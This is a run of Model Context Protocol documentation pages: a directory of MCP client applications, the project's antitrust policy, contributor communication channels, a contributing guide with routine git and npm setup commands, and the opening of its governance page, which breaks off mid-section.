* Users can quickly add or remove MCP servers via UI
* Any tool-supported local model on Ollama is compatible
TypingMind is an advanced frontend for LLMs with MCP support. TypingMind supports all popular LLM providers like OpenAI, Gemini, Claude, and users can use with their own API keys.
**Key features:**
* **MCP Tool Integration**: Once MCP is configured, MCP tools will show up as plugins that can be enabled/disabled easily via the main app interface.
* **Assign MCP Tools to Agents**: TypingMind allows users to create AI agents that have a set of MCP servers assigned.
* **Remote MCP servers**: Allows users to customize where to run the MCP servers via its MCP Connector configuration, allowing the use of MCP tools across multiple devices (laptop, mobile devices, etc.) or control MCP servers from a remote private server.
**Learn more:**
* [TypingMind MCP Document](https://www.typingmind.com/mcp)
* [Download TypingMind (PWA)](https://www.typingmind.com/)
v0 turns your ideas into fullstack apps, no code required. Describe what you want with natural language, and v0 builds it for you. v0 can search the web, inspect sites, automatically fix errors, and integrate with external tools.
**Key features:**
* **Visual to Code**: Create high-fidelity UIs from your wireframes or mockups
* **One-Click Deploy**: Deploy with one click to a secure, scalable infrastructure
* **Web Search**: Search the web for current information and get cited results
* **Site Inspector**: Inspect websites to understand their structure and content
* **Auto Error Fixing**: Automatically fix errors in your code with intelligent diagnostics
* **MCP Integrations**: Connect to MCP servers from the Vercel Marketplace for zero-config setup, or add your own custom MCP servers
**Learn more:**
* [v0 Website](https://v0.app)
VS Code integrates MCP with GitHub Copilot through [agent mode](https://code.visualstudio.com/docs/copilot/chat/chat-agent-mode), allowing direct interaction with MCP-provided tools within your agentic coding workflow. Configure servers from your Claude Desktop config or in workspace or user settings, with guided MCP installation and secure handling of keys in input variables to avoid leaking hard-coded keys.
**Key features:**
* Support for stdio and server-sent events (SSE) transport
* Per-session selection of tools per agent session for optimal performance
* Easy server debugging with restart commands and output logging
* Tool calls with editable inputs and always-allow toggle
* Integration with existing VS Code extension system to register MCP servers from extensions
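As an illustrative sketch of the workspace configuration described above, a `.vscode/mcp.json` file can declare servers alongside input variables so secrets are prompted for rather than hard-coded; the server name, package, and key ID below are placeholders:

```json theme={null}
{
  "inputs": [
    {
      "type": "promptString",
      "id": "api-key",
      "description": "API key for the example server",
      "password": true
    }
  ],
  "servers": {
    "example": {
      "type": "stdio",
      "command": "npx",
      "args": ["-y", "example-mcp-server"],
      "env": {
        "API_KEY": "${input:api-key}"
      }
    }
  }
}
```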
VT Code is a terminal coding agent that integrates with Model Context Protocol (MCP) servers, focusing on predictable tool permissions and robust transport controls.
**Key features:**
* Connect to MCP servers over stdio; optional experimental RMCP/streamable HTTP support
* Configurable per-provider concurrency, startup/tool timeouts, and retries via `vtcode.toml`
* Pattern-based allowlists for tools, resources, and prompts with provider-level overrides
**Learn more:**
* [MCP Integration Guide](https://github.com/vinhnx/vtcode/blob/main/docs/guides/mcp-integration.md)
Warp is the intelligent terminal with AI and your dev team's knowledge built in. With natural language capabilities integrated directly into an agentic command line, Warp enables developers to code, automate, and collaborate more efficiently, all within a terminal that features a modern UX.
**Key features:**
* **Agent Mode with MCP support**: invoke tools and access data from MCP servers using natural language prompts
* **Flexible server management**: add and manage CLI or SSE-based MCP servers via Warp's built-in UI
* **Live tool/resource discovery**: view tools and resources from each running MCP server
* **Configurable startup**: set MCP servers to start automatically with Warp or launch them manually as needed
WhatsMCP is an MCP client for WhatsApp. WhatsMCP lets you interact with your AI stack from the comfort of a WhatsApp chat.
**Key features:**
* Supports MCP tools
* SSE transport, full OAuth2 support
* Chat flow management for WhatsApp messages
* One-click setup for connecting to your MCP servers
* In-chat management of MCP servers
* OAuth flow natively supported in WhatsApp
Windsurf Editor is an agentic IDE that combines AI assistance with developer workflows. It features an innovative AI Flow system that enables both collaborative and independent AI interactions while maintaining developer control.
**Key features:**
* Revolutionary AI Flow paradigm for human-AI collaboration
* Intelligent code generation and understanding
* Rich development tools with multi-model support
Witsy is an AI desktop assistant, supporting Anthropic models and MCP servers as LLM tools.
**Key features:**
* Multiple MCP servers support
* Tool integration for executing commands and scripts
* Local server connections for enhanced privacy and security
* Easy-install from Smithery.ai
* Open-source, available for macOS, Windows and Linux
Zed is a high-performance code editor with built-in MCP support, focusing on prompt templates and tool integration.
**Key features:**
* Prompt templates surface as slash commands in the editor
* Tool integration for enhanced coding workflows
* Tight integration with editor features and workspace context
* Does not support MCP resources
Zencoder is a coding agent that's available as an extension for VS Code and the JetBrains family of IDEs, meeting developers where they already work. It comes with RepoGrokking (deep contextual codebase understanding), an agentic pipeline, and the ability to create and share custom agents.
**Key features:**
* RepoGrokking - deep contextual understanding of codebases
* Agentic pipeline - runs, tests, and executes code before outputting it
* Zen Agents platform - ability to build and create custom agents and share with the team
* Integrated MCP tool library with one-click installations
* Specialized agents for Unit and E2E Testing
**Learn more:**
* [Zencoder Documentation](https://docs.zencoder.ai)
## Adding MCP support to your application
If you've added MCP support to your application, we encourage you to submit a pull request to add it to this list. MCP integration can provide your users with powerful contextual AI capabilities and make your application part of the growing MCP ecosystem.
Benefits of adding MCP support:
* Enable users to bring their own context and tools
* Join a growing ecosystem of interoperable AI applications
* Provide users with flexible integration options
* Support local-first AI workflows
To get started with implementing MCP in your application, check out our [Python SDK](https://github.com/modelcontextprotocol/python-sdk) or [TypeScript SDK](https://github.com/modelcontextprotocol/typescript-sdk) documentation.
# Antitrust Policy
Source: https://modelcontextprotocol.io/community/antitrust
MCP Project Antitrust Policy for participants and contributors
**Effective: September 29, 2025**
This policy applies when participating in MCP meetings, Working Groups,
Interest Groups, and other collaborative forums where competitors may be
present. Most individual contributors working on code or documentation don't
need to worry about this in day-to-day work - it's primarily relevant for
group discussions about standards and specifications.
## Introduction
The goal of the Model Context Protocol open source project (the "Project") is to develop a universal standard for model-to-world interactions, including enabling LLMs and agents to seamlessly connect with and utilize external data sources and tools. The purpose of this Antitrust Policy (the "Policy") is to avoid antitrust risks in carrying out this pro-competitive mission.
Participants in and contributors to the Project (collectively, "participants") will use their best reasonable efforts to comply in all respects with all applicable state and federal antitrust and trade regulation laws, and applicable antitrust/competition laws of other countries (collectively, the "Antitrust Laws").
The goal of Antitrust Laws is to encourage vigorous competition. Nothing in this Policy prohibits or limits the ability of participants to make, sell or use any product, or otherwise to compete in the marketplace. This Policy provides general guidance on compliance with Antitrust Law. Participants should contact their respective legal counsel to address specific questions.
This Policy is conservative and is intended to promote compliance with the Antitrust Laws, not to create duties or obligations beyond what the Antitrust Laws actually require. In the event of any inconsistency between this Policy and the Antitrust Laws, the Antitrust Laws preempt and control.
## Participation
Technical participation in the Project shall be open to all, subject only to compliance with the provisions of the Project's charter and other governance documents.
## Conduct of Meetings
At meetings among actual or potential competitors, there is a risk that participants in those meetings may improperly disclose or discuss information in violation of the Antitrust Laws or otherwise act in an anti-competitive manner. To avoid this risk, participants must adhere to the following policies when participating in Project-related or sponsored meetings, conference calls, or other forums (collectively, "Project Meetings").
Participants must not, in fact or appearance, discuss or exchange information regarding:
* An individual company's current or projected prices, price changes, price differentials, markups, discounts, allowances, terms and conditions of sale, including credit terms, etc., or data that bear on prices, including profits, margins or cost.
* Industry-wide pricing policies, price levels, price changes, differentials, or the like.
* Actual or projected changes in industry production, capacity or inventories.
* Matters relating to bids or intentions to bid for particular products, procedures for responding to bid invitations or specific contractual arrangements.
* Plans of individual companies concerning the design, characteristics, production, distribution, marketing or introduction dates of particular products, including proposed territories or customers.
* Matters relating to actual or potential individual suppliers that might have the effect of excluding them from any market or of influencing the business conduct of firms toward such suppliers.
* Matters relating to actual or potential customers that might have the effect of influencing the business conduct of firms toward such customers.
* Individual company current or projected cost of procurement, development or manufacture of any product.
* Individual company market shares for any product or for all products.
* Confidential or otherwise sensitive business plans or strategy.
In connection with all Project Meetings, participants must do the following:
* Adhere to prepared agendas.
* Insist that meeting minutes be prepared and distributed to all participants, and that meeting minutes accurately reflect the matters that transpired.
* Consult with their respective counsel on all antitrust questions related to Project Meetings.
* Protest against any discussions that appear to violate these policies or the Antitrust Laws, insist that such protest be noted in the minutes, and leave any meeting in which such discussions continue.
## Requirements/Standard Setting
The Project may establish standards, technical requirements and/or specifications for use (collectively, "requirements"). Participants shall not enter into agreements that prohibit or restrict any participant from establishing or adopting any other requirements. Participants shall not undertake any efforts, directly or indirectly, to prevent any firm from manufacturing, selling, or supplying any product not conforming to a requirement.
The Project shall not promote standardization of commercial terms, such as terms for license and sale.
## Contact Information
To contact the Project regarding matters addressed by this Antitrust Policy, please send an email to [antitrust@modelcontextprotocol.io](mailto:antitrust@modelcontextprotocol.io), and reference "Antitrust Policy" in the subject line.
# Contributor Communication
Source: https://modelcontextprotocol.io/community/communication
Communication strategy and framework for the Model Context Protocol community
This document explains how to communicate and collaborate within the Model Context Protocol (MCP) project.
## Communication Channels
| Channel | Purpose | When to Use |
| ----------------------------------------------------------------------------------------------------------- | --------------------- | ------------------------------------------------ |
| [Discord](https://discord.gg/6CSzBmMkjX) | Real-time discussion | Quick questions, coordination, WG/IG discussions |
| [Live calls](https://meet.modelcontextprotocol.io/) | Sync up | WG/IG presentations, progress reports |
| [GitHub Discussions](https://github.com/modelcontextprotocol/modelcontextprotocol/discussions) | Structured discussion | Proposals, roadmap planning, longer-form debate |
| [GitHub Issues](https://github.com/modelcontextprotocol/modelcontextprotocol/issues) | Actionable tasks | Bug reports, documentation fixes |
| [Vulnerability reports](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/SECURITY.md) | Security issues | Vulnerabilities - **never post publicly** |
All communication is governed by our [Code of Conduct](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/CODE_OF_CONDUCT.md). We expect respectful, professional, and inclusive interactions across all channels.
## Discord
The [MCP Contributor Discord](https://discord.gg/6CSzBmMkjX) is for real-time contributor discussion and collaboration. The server is designed for **MCP contributors** and is not intended for general MCP support.
### Public Channels (Default)
**Purpose:** Open community engagement, collaborative development, and transparent project coordination.
**Primary use cases:**
* SDK and tooling development (e.g., `#typescript-sdk-dev`, `#inspector-dev`)
* [Working Group and Interest Group](/community/working-interest-groups) discussions (e.g., `#auth-wg`, `#security-ig`)
* Community onboarding and contribution guidance
* Community feedback and collaborative brainstorming
* Public office hours and maintainer availability
**Avoid:**
* MCP user support - Read official documentation and use GitHub Discussions for questions
* Service or product marketing - Keep discussions vendor-neutral; mentions of brands are discouraged except as examples relevant to the specification
### Private Channels (Exceptions)
**Purpose:** Confidential coordination and sensitive matters. Access is restricted to designated maintainers.
**Criteria for private use:**
* Security incidents (CVEs, protocol vulnerabilities)
* People matters (maintainer discussions, code of conduct issues)
* Coordination requiring immediate or focused response with a limited audience
* Some channels are read-only for maintainer decision-making
**Transparency requirements:**
* All technical and governance decisions affecting the community must be documented in GitHub Discussions and/or Issues, labeled with `notes`
* Private channels are temporary "incident rooms," not for routine development
* Some matters related to individual contributors may remain private when appropriate
Any significant discussion on Discord that leads to a potential decision or proposal must be moved to a GitHub Discussion or Issue for a persistent, searchable record.
## GitHub Discussions
Use for structured, long-form discussion and debate on project direction.
**When to use:**
* Project roadmap planning and milestone discussions
* Announcements and release communications
* Community polls and consensus-building
* Feature requests with context and rationale
* If a repository doesn't have Discussions enabled, use GitHub Issues instead
## GitHub Issues
Use for bug reports and actionable development tasks. Feature requests should go to [GitHub Discussions](https://github.com/modelcontextprotocol/modelcontextprotocol/discussions).
**When to use:**
* Bug reports with reproducible steps
* Documentation improvements with specific scope
* CI/CD problems and infrastructure issues
* Release tasks and milestone tracking
**Note:** SEP proposals are submitted as pull requests to the [`seps/` directory](https://github.com/modelcontextprotocol/modelcontextprotocol/tree/main/seps), not as GitHub Issues. See the [SEP Guidelines](/community/sep-guidelines).
## Security Issues
**Do not post security issues publicly.**
1. Use the private security reporting process in [SECURITY.md](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/SECURITY.md)
2. Contact the Lead Maintainers or [Core Maintainers](/community/governance#current-core-maintainers) directly
3. Follow responsible disclosure guidelines
## Decision Records
All MCP decisions are documented in public channels:
| Type | Location |
| --------------------- | --------------------------------------------------------------------------------------------- |
| Technical decisions | [GitHub Issues](https://github.com/modelcontextprotocol/modelcontextprotocol/issues) and SEPs |
| Specification changes | [Changelog](https://modelcontextprotocol.io/specification/draft/changelog) |
| Process changes | [Community documentation](https://modelcontextprotocol.io/community/governance) |
| Governance decisions | [GitHub Issues](https://github.com/modelcontextprotocol/modelcontextprotocol/issues) and SEPs |
When documenting decisions, we retain as much context as possible:
* Decision makers
* Background context and motivation
* Options considered
* Rationale for chosen approach
* Implementation steps
# Contributing to MCP
Source: https://modelcontextprotocol.io/community/contributing
How to contribute to the Model Context Protocol project
The Model Context Protocol (MCP) is an open source project that welcomes contributions from the
community. This guide walks you through everything you need to get started.
## Before You Begin
### Prerequisites
Before contributing, ensure you have the following installed and ready:
* **[Git](https://git-scm.com/downloads)** - For cloning repositories and submitting changes
* **[Node.js 24+](https://nodejs.org/)** - Required for building and testing our projects
* **npm** - Comes with Node.js, used for dependency management
* **[GitHub account](https://github.com/signup)** - For submitting pull requests and issues
* **Language-specific tooling** - If contributing to an SDK, you'll need the appropriate
development environment for that language (e.g., Python, Rust, Go)
Verify your setup:
```bash theme={null}
node --version # Should be 24.x or higher
npm --version # Should be 11.x or higher
git --version # Any recent version
```
These commands work the same on macOS, Linux, and Windows, so you're good to
go on any platform.
### Repository Structure
MCP spans multiple repositories in the
[`modelcontextprotocol`](https://github.com/modelcontextprotocol) organization on GitHub. Here are
a few notable sub-projects worth checking out:
| Repository | Contents |
| ----------------------------------------------------------------------------------------------------------- | ------------------------- |
| [`modelcontextprotocol/modelcontextprotocol`](https://github.com/modelcontextprotocol/modelcontextprotocol) | Specification, docs, SEPs |
| [`modelcontextprotocol/typescript-sdk`](https://github.com/modelcontextprotocol/typescript-sdk) | TypeScript/JavaScript SDK |
| [`modelcontextprotocol/python-sdk`](https://github.com/modelcontextprotocol/python-sdk) | Python SDK |
| [`modelcontextprotocol/go-sdk`](https://github.com/modelcontextprotocol/go-sdk) | Go SDK |
| [`modelcontextprotocol/java-sdk`](https://github.com/modelcontextprotocol/java-sdk) | Java SDK |
| [`modelcontextprotocol/kotlin-sdk`](https://github.com/modelcontextprotocol/kotlin-sdk) | Kotlin SDK |
| [`modelcontextprotocol/csharp-sdk`](https://github.com/modelcontextprotocol/csharp-sdk) | C# SDK |
| [`modelcontextprotocol/swift-sdk`](https://github.com/modelcontextprotocol/swift-sdk) | Swift SDK |
| [`modelcontextprotocol/rust-sdk`](https://github.com/modelcontextprotocol/rust-sdk) | Rust SDK |
| [`modelcontextprotocol/ruby-sdk`](https://github.com/modelcontextprotocol/ruby-sdk) | Ruby SDK |
| [`modelcontextprotocol/php-sdk`](https://github.com/modelcontextprotocol/php-sdk) | PHP SDK |
Throughout this guide, **specification repository** refers to
`modelcontextprotocol/modelcontextprotocol`, which contains the protocol spec, this documentation
site, and [Spec Enhancement Proposals (SEPs)](/community/sep-guidelines).
### Project Roles
MCP follows a [governance model](/community/governance) with different levels of responsibility:
* **Contributors** - Anyone who files issues, submits PRs, or participates in discussions (that's
you!)
* **Maintainers** - Steward specific areas like SDKs, documentation, or
[Working Groups](/community/working-interest-groups)
* **Core Maintainers** - Guide overall project direction, review SEPs, and oversee the specification
You can find the current list of maintainers in the
[`MAINTAINERS.md`](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md)
file.
Maintainers are here to help you succeed! Don't hesitate to reach out if you have questions or
need guidance on your contribution.
## Your First Contribution
Start here if you are new to MCP and contributing to its ecosystem.
While we use the specification repository as an example, the key patterns are
applicable to other MCP repos as well.
### Step 1: Set Up Your Environment
Set up your local environment so you can test and validate changes before submitting them.
Click the **Fork** button on the [repository page](https://github.com/modelcontextprotocol/modelcontextprotocol) to create your own copy. This gives you a personal workspace where you can make changes without affecting the main project.
```bash theme={null}
git clone https://github.com/YOUR-USERNAME/modelcontextprotocol.git
cd modelcontextprotocol
```
Replace `YOUR-USERNAME` with your GitHub username.
```bash theme={null}
npm install
```
This installs the tools needed for schema generation, documentation building, and validation.
```bash theme={null}
npm run check
```
This runs TypeScript compilation, schema validation, example validation, documentation link checks, and formatting checks. If everything passes, your environment is good and you're ready to contribute.
If `npm run check` fails, see [Troubleshooting](#troubleshooting) below.
### Step 2: Find Something to Work On
Many of the items tracked in the repository can feel intimidating, especially for newcomers, but there are plenty of places to make your first improvements:
1. **Documentation improvements** - Help us fix typos, unclear explanations, broken links, or
incomplete examples
2. **Issues labeled `good first issue`** - Tackle issues tagged in the
[specification repo](https://github.com/modelcontextprotocol/modelcontextprotocol/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22)
as well as our SDK repos
3. **Schema examples** - Add examples to `schema/draft/examples/` to make it easier for developers
to understand protocol primitives
### Step 3: Make Your Change
Create your changes in a dedicated branch.
```bash theme={null}
git checkout -b fix/your-description
```
Use a descriptive branch name that reflects your change, like `fix/typo-in-tools-doc` or `feat/add-example-for-resources`.
Edit the relevant files in your local copy. If you're editing schema files, remember to run `npm run generate:schema` to regenerate the JSON schema and documentation.
```bash theme={null}
npm run check
```
Fix any issues before committing. If you have formatting errors, `npm run format` can auto-fix most of them.
```bash theme={null}
git commit -m "Fix typo in tools documentation"
```
Write a concise message that describes what you changed and why. Reference issue numbers if applicable (e.g., `Fix typo in tools documentation (#123)`).
### Step 4: Submit a Pull Request
When you're ready, push your branch and open a pull request.
```bash theme={null}
git push origin fix/your-description
```
You can use the [GitHub CLI](https://cli.github.com/) to make this process easier:
```bash theme={null}
gh pr create --fill
```
Alternatively, navigate to your fork on GitHub and click **Compare & pull request**.
Provide a clear description of your changes and link any related issues.
Maintainers typically respond within 1-5 business days.
That's it, **congratulations on your first contribution**! Every improvement,
no matter how small, helps make MCP better for everyone.
### What Makes a Good Contribution
Help us review your contribution quickly by following these patterns:
| Harder to Review | Thoughtful and Impactful |
| -------------------------------------------- | ------------------------------------------------ |
| Large PR with unrelated changes | Focused PR addressing one issue |
| Reformatting code without functional changes | Fixing a bug with a clear explanation |
| Vague commit messages ("fixed stuff") | Descriptive commits linking to issues |
| Submitting with failing CI checks | All CI tests pass before requesting review |
| Duplicating existing documentation | Documenting an undocumented feature or edge case |
## Types of Contributions
Different contributions follow different processes depending on their scope.
Not sure which category your change falls into? Ask in the [MCP Contributor
Discord](/community/communication#discord) before starting any significant
work.
### Small Changes (Direct PR)
Simply submit a pull request directly to the repo for:
* Bug fixes and typo corrections
* Documentation improvements, such as bringing clarity to an ambiguous or unclear section
* Adding examples to existing features
* Minor schema fixes that don't materially change the specification or SDK behavior
* Test improvements
### Major Changes (SEP Required)
Anything that changes the MCP specification requires following the
[Specification Enhancement Proposal (SEP)](/community/sep-guidelines) process. This includes, but
is not limited to:
* New protocol features or API methods
* Breaking changes to existing behavior
* Changes to the message format or schema structure
* New interoperability standards
* Governance or process changes
Here are a few concrete examples of what would require following the SEP steps:
* Adding a new RPC method like `tools/execute`
* Changing how authentication and authorization works
* Adding a new capability negotiation field
* Modifying the transport layer specification
## Working with the Specification Repository
Once you've determined [what type of contribution](#types-of-contributions) you're making, here's
how to work with the specification repository.
### Schema Changes
The TypeScript schema (`schema/draft/schema.ts`) is the **source of truth** for the protocol. It
defines every message type, request/response structure, and primitive (tools, resources, prompts)
that clients and servers exchange. SDK implementers across all languages rely on this schema to
build conformant implementations.
When you run `npm run generate:schema`, it generates:
* The JSON schema (`schema/draft/schema.json`) for validation
* The Schema Reference documentation (`docs/specification/draft/schema.mdx`)
To modify the schema:

1. Make your changes in `schema/draft/schema.ts`.

2. Add JSON examples in `schema/draft/examples/[TypeName]/` (e.g., `Tool/my-example.json`). Reference them in the schema using `@example` + `@includeCode` JSDoc tags.

3. Regenerate the JSON schema and documentation:

   ```bash theme={null}
   npm run generate:schema
   ```

4. Run the full validation suite:

   ```bash theme={null}
   npm run check
   ```
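As a rough sketch, adding a new example file for the `Tool` type might look like this (the file name and tool contents here are illustrative; mirror the shape of existing files in `schema/draft/examples/`):

```bash theme={null}
# Create a hypothetical example file for the Tool type
mkdir -p schema/draft/examples/Tool
cat > schema/draft/examples/Tool/get-weather.json <<'EOF'
{
  "name": "get_weather",
  "description": "Get the current weather for a location",
  "inputSchema": {
    "type": "object",
    "properties": {
      "location": { "type": "string", "description": "City name" }
    },
    "required": ["location"]
  }
}
EOF
```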
### Documentation Changes
Docs are written in [MDX format](https://mdxjs.com/) (Markdown with JSX components) and powered by
[Mintlify](https://mintlify.com/). The `docs/` directory contains:
* `docs/docs/` - Guides and tutorials for getting started and building with MCP
* `docs/specification/` - Formal protocol specification (versioned by date)
Here is how you can contribute to our documentation:
1. Start a local preview server:

   ```bash theme={null}
   npm run serve:docs
   ```

   This launches a live preview at `http://localhost:3000` with hot reloading.

2. Edit the relevant `.mdx` files. You can use [Mintlify components](https://www.mintlify.com/docs/components) for richer formatting.

3. Validate your changes:

   ```bash theme={null}
   npm run check:docs
   ```

   This checks formatting, broken links, and other common issues.
### Major Protocol Changes
For significant changes, follow the [SEP process](/community/sep-guidelines). Before spending a lot of time on a spec proposal, follow these best practices:

1. Discuss your idea in an [Interest Group](/community/working-interest-groups) or on [Discord](https://discord.gg/6CSzBmMkjX).
2. Build a prototype that demonstrates the practical application of your idea.
3. Find a sponsor: a maintainer from the [maintainer list](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md) who will champion your proposal.
4. Submit your proposal following the [SEP Guidelines](/community/sep-guidelines).
## Working with the SDK Repositories
MCP maintains official SDKs in multiple languages. Contributions are welcome - whether you're
fixing bugs, improving performance, adding features, or enhancing documentation.
Each SDK has its own repository, maintainers, and contribution guidelines.
Some SDKs are maintained in collaboration with larger partner organizations,
such as Google, Microsoft, JetBrains, and others, so processes may vary
slightly between repositories.
### Before Contributing to an SDK
Before diving into code, follow these steps:

1. Before starting significant work, open an issue to discuss your approach. This helps avoid duplicate effort, ensures your contribution aligns with the SDK's direction, and gives maintainers a chance to provide early feedback.
2. Find the relevant channel in [Discord](https://discord.gg/6CSzBmMkjX) (e.g., `#typescript-sdk-dev`, `#python-sdk-dev`).
3. Read the repository's `CONTRIBUTING.md`, which has specific instructions for setting up your development environment, coding standards, commit message conventions, and PR requirements.
4. Include appropriate test coverage with every contribution. Bug fixes should include a test that reproduces the issue, and new features should have tests covering the expected behavior. This helps maintain SDK reliability and prevents regressions.
### SDK Repositories
See the [Repository Structure](#repository-structure) table above for the full list of official SDK repositories.
## Getting Help
### Communication Channels
Got questions or need guidance? The MCP community is here to help.
* **[Discord](/community/communication#discord)** - Real-time discussion with contributors and
maintainers, focused on MCP contributions (not general MCP support)
* **[GitHub Discussions](https://github.com/modelcontextprotocol/modelcontextprotocol/discussions)**
\- Exploration and conversation: **feature requests**, questions, roadmap planning, and proposals
that need input before becoming concrete tasks
* **[GitHub Issues](https://github.com/modelcontextprotocol/modelcontextprotocol/issues)** -
Actionable work: bug reports with reproducible steps, documentation fixes, and tasks that are
well-defined and ready to implement (not feature requests)
This separation helps maintainers focus on work that's ready for implementation while giving ideas
room to develop. If you're unsure whether something is ready to be an issue, start with a
discussion. For a complete guide, see our [Contributor Communication](/community/communication)
documentation.
For protocol discussions, join [Working Group](/community/working-interest-groups) channels like
`#auth-wg` or `#server-identity-wg`. For SDK help, find your language's channel (e.g.,
`#typescript-sdk-dev`).
### Finding a Sponsor for SEPs
A **sponsor** is a Core Maintainer or Maintainer who champions your SEP through the review
process. They provide feedback, help refine your proposal, and present it at Core Maintainer
meetings.
Every SEP needs a sponsor to move forward. SEPs that don't find a sponsor
within 6 months are marked as **dormant**. Dormant SEPs aren't rejected
outright - they can be revived later if a sponsor is found or the proposal is
re-assessed to be needed.
To find a sponsor:

1. Look at the [maintainer list](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md) to find maintainers working in your area.
2. Tag 1-2 relevant maintainers (don't spam everyone).
3. Post your PR in the relevant Discord channel to increase visibility.
4. If there's no response after 2 weeks, ask in `#general` or reach out to a Core Maintainer.
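If you prefer the command line, tagging maintainers can be as simple as a PR comment (the PR number and username here are placeholders):

```bash theme={null}
# Ask a relevant maintainer to consider sponsoring the SEP
gh pr comment 1850 --body "cc @relevant-maintainer - would you be open to sponsoring this SEP?"
```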
Maintainers review open proposals regularly, but response time varies based on complexity and
availability.
## Troubleshooting
Sometimes things don't go as planned - that's completely normal! Here are solutions to common
issues. If you're still stuck, don't hesitate to ask for help in
[Discord](/community/communication#discord). The community is friendly and happy to help you get
unstuck.
### `npm run check` fails
Common causes:
* **Wrong Node.js version** - Ensure you have Node.js 24+
* **Missing dependencies** - Run `npm install` again
* **Schema out of sync** - Run `npm run generate:schema`
* **Formatting issues** - Run `npm run format` to auto-fix
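If you're not sure which cause applies, running through the fixes in order usually gets things green again:

```bash theme={null}
node --version           # confirm 24.x or higher
npm install              # refresh dependencies
npm run generate:schema  # re-sync the generated schema and docs
npm run format           # auto-fix formatting issues
npm run check            # re-run the full validation suite
```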
### My PR has been sitting unnoticed for weeks
1. Ensure all CI checks pass
2. Politely ping the desired reviewer in a comment
3. Ask in the relevant Discord channel
4. For urgent issues, reach out to a Core Maintainer
### I can't find a sponsor for my SEP
1. Make sure your idea has been discussed in Discord or an Interest Group first
2. Proposals with demonstrated community interest are more likely to find sponsors
3. Consider whether your change might be too large - could it be split into smaller SEPs?
### My SEP was rejected
Don't take it personally - a SEP rejection doesn't mean your idea was bad. SEPs can be rejected
for many reasons: timing, scope, competing priorities, or simply because the protocol isn't ready
for that change yet. The feedback you receive is valuable and often points toward a path forward.
Rejection is not permanent. You have a few options ahead:
1. **Address the feedback and resubmit** - Often, rejection comes with specific concerns.
Addressing those concerns and resubmitting can be the right path forward.
2. **Discuss in Discord** - Talk with maintainers to better understand the concerns. Sometimes a
brief conversation reveals a simpler path forward.
3. **Try a different approach** - Submit a new SEP that addresses the same problem differently,
incorporating what you learned.
4. **Wait for the right moment** - Circumstances change. New use cases emerge, the community
grows, and priorities shift. An idea rejected today might be welcomed tomorrow.
## Out of Scope
This guide covers contributions to the **core MCP project** - the specification, official SDKs,
and documentation.
Building your own MCP servers, clients, or tools is **not** covered here. For guidance on building
with MCP, see our documentation:
* [Build a Server](/docs/develop/build-server)
* [Build a Client](/docs/develop/build-client)
* [Example Servers](/examples)
If you build something you'd like to share with the community, you can submit it to the
[MCP Registry](/registry/about).
## AI Contributions
We welcome the use of AI tools like Claude or ChatGPT to help with your contributions! If you do
use AI assistance, just let us know in your pull request or issue - a quick note about how you
used it (drafting docs, generating code, brainstorming, etc.) is all we need.
The key is that you understand and can stand behind your contribution:
* **You get it** - You understand what the changes do and can explain them
* **You know why** - You can articulate why the change is needed
* **You've verified it** - You've tested or validated that it works as intended
You can read more about our stance in
[our spec contribution guidelines](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/CONTRIBUTING.md#ai-contributions).
## Code of Conduct
All contributors must follow the
[Code of Conduct](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/CODE_OF_CONDUCT.md).
We expect respectful, professional, and inclusive interactions across all channels.
## License
By contributing, you agree that your contributions will be licensed under:
* **Code and specifications**: Apache License 2.0
* **Documentation** (excluding specifications): CC-BY 4.0
See the
[LICENSE](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/LICENSE) file for
details.
# Governance and Stewardship
Source: https://modelcontextprotocol.io/community/governance
Learn about the Model Context Protocol's governance structure and how to participate in the community
The Model Context Protocol (MCP) follows a formal governance model to ensure transparent decision-making and community participation. This document outlines how the project is organized and how decisions are made.
## General Project Policies
Model Context Protocol has been established as **Model Context Protocol a Series of LF Projects, LLC**. Policies applicable to Model Context Protocol and participants in Model Context Protocol, including guidelines on the usage of trademarks, are located at [https://www.lfprojects.org/policies/](https://www.lfprojects.org/policies/). Governance changes approved as per the provisions of this governance document must also be approved by LF Projects, LLC.
Model Context Protocol participants acknowledge that the copyright in all new contributions will be retained by the copyright holder as independent works of authorship and that no contributor or copyright holder will be required to assign copyrights to the project.
Except as described below, all code and specification contributions to the project must be made using the Apache License, Version 2.0 (available here: [https://www.apache.org/licenses/LICENSE-2.0](https://www.apache.org/licenses/LICENSE-2.0)) (the "Project License").
All outbound code and specifications will be made available under the Project License. The Core Maintainers may approve the use of an alternative open license or licenses for inbound or outbound contributions on an exception basis.
All documentation (excluding specifications) will be made available under Creative Commons Attribution 4.0 International license, available at: [https://creativecommons.org/licenses/by/4.0](https://creativecommons.org/licenses/by/4.0).
## Technical Governance
The MCP project adopts a hierarchical structure, similar to Python, PyTorch, and other open source projects:
| Role | Scope |
| --------------------------- | -------------------------------- |
| **Lead Maintainers (BDFL)** | Final decision authority |
| **Core Maintainers** | Overall project direction |
| **Maintainers** | Working Groups, SDKs, components |
| **Contributors** | Issues, PRs, discussions |
* **Contributors** file issues, make pull requests, and contribute to the project.
* **Maintainers** drive components within the MCP project, such as SDKs, documentation, and Working Groups.
* **Core Maintainers** drive the overall project direction and oversee contributors and maintainers.
* **Lead Maintainers** are the final decision makers (also known as BDFL - Benevolent Dictator for Life).
Together, Maintainers, Core Maintainers, and Lead Maintainers form the **MCP Steering Group**.
All maintainers are expected to have a strong bias towards MCP's design philosophy. Membership in the technical governance process is for individuals, not companies. That is, there are no seats reserved for specific companies, and membership is associated with the person rather than the company employing that person.
### Communication Channels
Technical governance is facilitated through a shared [Discord server](https://discord.gg/6CSzBmMkjX) for all maintainers. Each maintainer group can choose additional communication channels, but all decisions and their supporting discussions must be recorded and made transparently available on the Discord server.
### Maintainers
Maintainers are responsible for [Working Groups or Interest Groups](/community/working-interest-groups) within the MCP project. These generally are independent repositories such as language-specific SDKs, but can also extend to subdirectories of a repository, such as the MCP documentation.
Maintainers may adopt their own rules and procedures for making decisions. They are expected to make decisions for their respective projects independently, but can defer or escalate to the Core Maintainers when needed.
**Maintainer responsibilities:**
